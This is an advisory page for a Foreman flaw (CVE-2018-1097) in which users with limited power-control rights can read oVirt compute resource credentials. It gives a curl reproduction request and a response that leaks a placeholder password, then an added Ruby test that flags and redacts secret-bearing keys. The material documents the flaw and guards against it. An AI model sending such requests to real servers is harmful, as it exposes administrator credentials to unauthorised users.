Headline
CVE-2018-1097: Bug #22546: CVE-2018-1097: curl api to change power state on ovirt compute_resource exposes credentials
A flaw was found in Foreman before 1.16.1. The issue allows users with limited permissions for powering oVirt/RHV hosts on and off to discover the username and password used to connect to the compute resource.
Description
Looks like the same issue as https://bugzilla.redhat.com/show_bug.cgi?id=1211613 so perhaps this is a regression.
curl -X PUT -H "Content-Type:application/json" -H "Accept:application/json" -k -u user:password -d '{"power_action": "on"}' https://foreman/api/v2/hosts/testhost.domain.name/power
{"power":{"raw":{"name":"testhost.domain.name","href":"/ovirt-engine/api/v3/vms/b67a994d-68f5-4cba-a515-c79536ce55fe","id":"b67a994d-68f5-4cba-a515-c79536ce55fe","client":{"api_entrypoint":"https://ovirt.domain.name/ovirt-engine/api/v3","credentials":{"username":"admin@internal","password":"unmaskedpassword"},
…
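A regression check for this class of leak, as an added example that is not part of the original report and not Foreman's own fix: it walks a parsed API response, reports the path of every secret-bearing key, and shows a redacting filter applied before rendering. The key-name pattern, the helper names and the sample response (same shape as the output above, with constructed values) are assumptions.

```ruby
require "json"

# Key names treated as secret-bearing (assumption; extend for your API).
SENSITIVE_KEYS = /\A(password|passwd|secret|token|credentials|api_key)\z/i
REDACTED = "[REDACTED]"

# True when a value carries nothing secret: nil, empty, or already masked.
def masked?(value)
  value.nil? || value == REDACTED || (value.respond_to?(:empty?) && value.empty?)
end

# Return the dotted path of every sensitive key holding an unmasked value,
# e.g. "power.raw.client.credentials.password".
def leaked_paths(node, path = [])
  case node
  when Hash
    node.flat_map do |key, value|
      here = path + [key.to_s]
      hits = leaked_paths(value, here)
      hits.unshift(here.join(".")) if key.to_s.match?(SENSITIVE_KEYS) && !masked?(value)
      hits
    end
  when Array
    node.each_with_index.flat_map { |v, i| leaked_paths(v, path + ["[#{i}]"]) }
  else
    []
  end
end

# Deep copy of the document with every sensitive value replaced by a marker.
def redact(node)
  case node
  when Hash
    node.each_with_object({}) do |(k, v), out|
      out[k] = k.to_s.match?(SENSITIVE_KEYS) ? REDACTED : redact(v)
    end
  when Array then node.map { |v| redact(v) }
  else node
  end
end

# Constructed sample shaped like the power API output in this report.
SAMPLE = <<~JSON
  {"power":{"raw":{"name":"host.example","client":{"api_entrypoint":"https://ovirt.example/ovirt-engine/api/v3","credentials":{"username":"svc@internal","password":"constructed-secret"}}}}}
JSON

doc = JSON.parse(SAMPLE)
puts leaked_paths(doc)           # paths that would fail an API response test
puts JSON.generate(redact(doc))  # what a filtered response would look like
```

Run as an assertion in an API test suite, a non-empty result from leaked_paths on any response body fails the build.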
Related news
Cross-site scripting (XSS) vulnerability in the search auto-completion functionality in Foreman before 1.4.4 allows remote authenticated users to inject arbitrary web script or HTML via a crafted key name.